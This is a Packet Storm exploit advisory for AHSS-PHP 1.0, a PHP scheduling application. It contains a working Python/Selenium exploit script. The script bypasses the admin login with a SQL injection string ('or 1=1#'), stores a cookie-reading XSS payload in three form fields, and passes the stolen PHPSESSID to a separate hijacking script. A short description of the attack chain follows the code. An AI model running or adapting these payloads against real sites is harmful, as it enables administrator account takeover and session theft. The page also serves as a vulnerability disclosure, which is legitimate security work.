what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AHSS-PHP 1.0 Cross Site Scripting / SQL Injection

AHSS-PHP 1.0 Cross Site Scripting / SQL Injection
Posted Sep 15, 2021
Authored by nu11secur1ty

AHSS-PHP version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, php, vulnerability, xss, sql injection
SHA-256 | 68a392a056a9f2e1e642c82f281adc0a3d69f62cd8340f5fa33f333a57a01d1d

AHSS-PHP 1.0 Cross Site Scripting / SQL Injection

Change Mirror Download
### Exploit Title: AHSS-PHP (by: oretnom23 ) v1.0 is vulnerable in the application /scheduler/classes/Login.php to remote SQL-Injection-Bypass-Authentication + XSS-Stored Hijacking PHPSESSID
### Author: nu11secur1ty
### Testing and Debugging: nu11secur1ty
### Date: 09.15.2021
### Vendor: https://www.sourcecodester.com/user/257130/activity
### Link:
https://www.sourcecodester.com/php/14902/simple-assembly-hall-scheduling-system-php-free-source-code.html
### CVE: CVE-nu11-11

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-nu11-11-09152021

from selenium import webdriver
import time
import os
from colorama import init, Fore, Back, Style
init(convert=True)
import requests


#enter the link to the website you want to automate login.
website_link="http://localhost/scheduler/admin/login.php"

#enter your login username
username="nu11secur1ty' or 1=1#"

#enter your login password
password="nu11secur1ty' or 1=1#"

#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="password"

browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
browser.maximize_window()
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn btn-primary
btn-block\"]').click()")

time.sleep(1)
exploit_link="
http://localhost/scheduler/admin/?page=assembly_hall/manage_assembly"
browser.get((exploit_link))

browser.execute_script("document.querySelector('[name=\"room_name\"]').value=\"<script>alert(document.cookie)</script>\"")
browser.execute_script("document.querySelector('[name=\"location\"]').value=\"<script>alert(document.cookie)</script>\"")
browser.execute_script("document.querySelector('[name=\"description\"]').value=\"<script>alert(document.cookie)</script>\"")
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn btn-flat
btn-primary\"]').click()")

coockie=browser.execute_script("return document.cookie")
coockie=coockie.split("=")[1]
print(coockie)
browser.close()

time.sleep(3)
os.system("python PWNPHPSESSID.py " + coockie)

print(Fore.GREEN +"The payload for CVE-nu11-11 is deployed...\n")
print(Style.RESET_ALL)

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")


------------------------------------------------------------------

### Description:
The AHSS-PHP (by: oretnom23 ) v1.0 is vulnerable in the application
/scheduler/classes/Login.php to remote SQL-Injection-Bypass-Authentication
+ XSS-Stored Hijacking PHPSESSID
- m0re info:
https://portswigger.net/support/using-sql-injection-to-bypass-authentication.

The parameter (username) from the login form is not protected correctly and
there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the
MySQL server he can bypass the login credentials and take control of the
administer account.
2. XSS - Stored PHPSESSID Vulnerable
- The vulnerable XSS app: is "manage_assembly", parameters: "room_name"
"location" and "description"
After the successful SQL injection, the malicious user can be storing an
XSS payload whit who can take the
active PHPSESSID session.
3. remote PHPSESSID - Injection
- After the successful XSS attack the malicious user can take control of
the administrative account of the system from everywhere
by using the PHPSESSID, and then he can make a lot of bad things!

-------------------------------------------------------------------
### CONCLUSION: This vendor must STOP creating all these broken projects
and vulnerable software programs, probably he is not a developer!

### BR
- [+] @nu11secur1ty System Administrator - Infrastructure and Penetration
Testing Engineer

-------------------------------------------------------------------
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close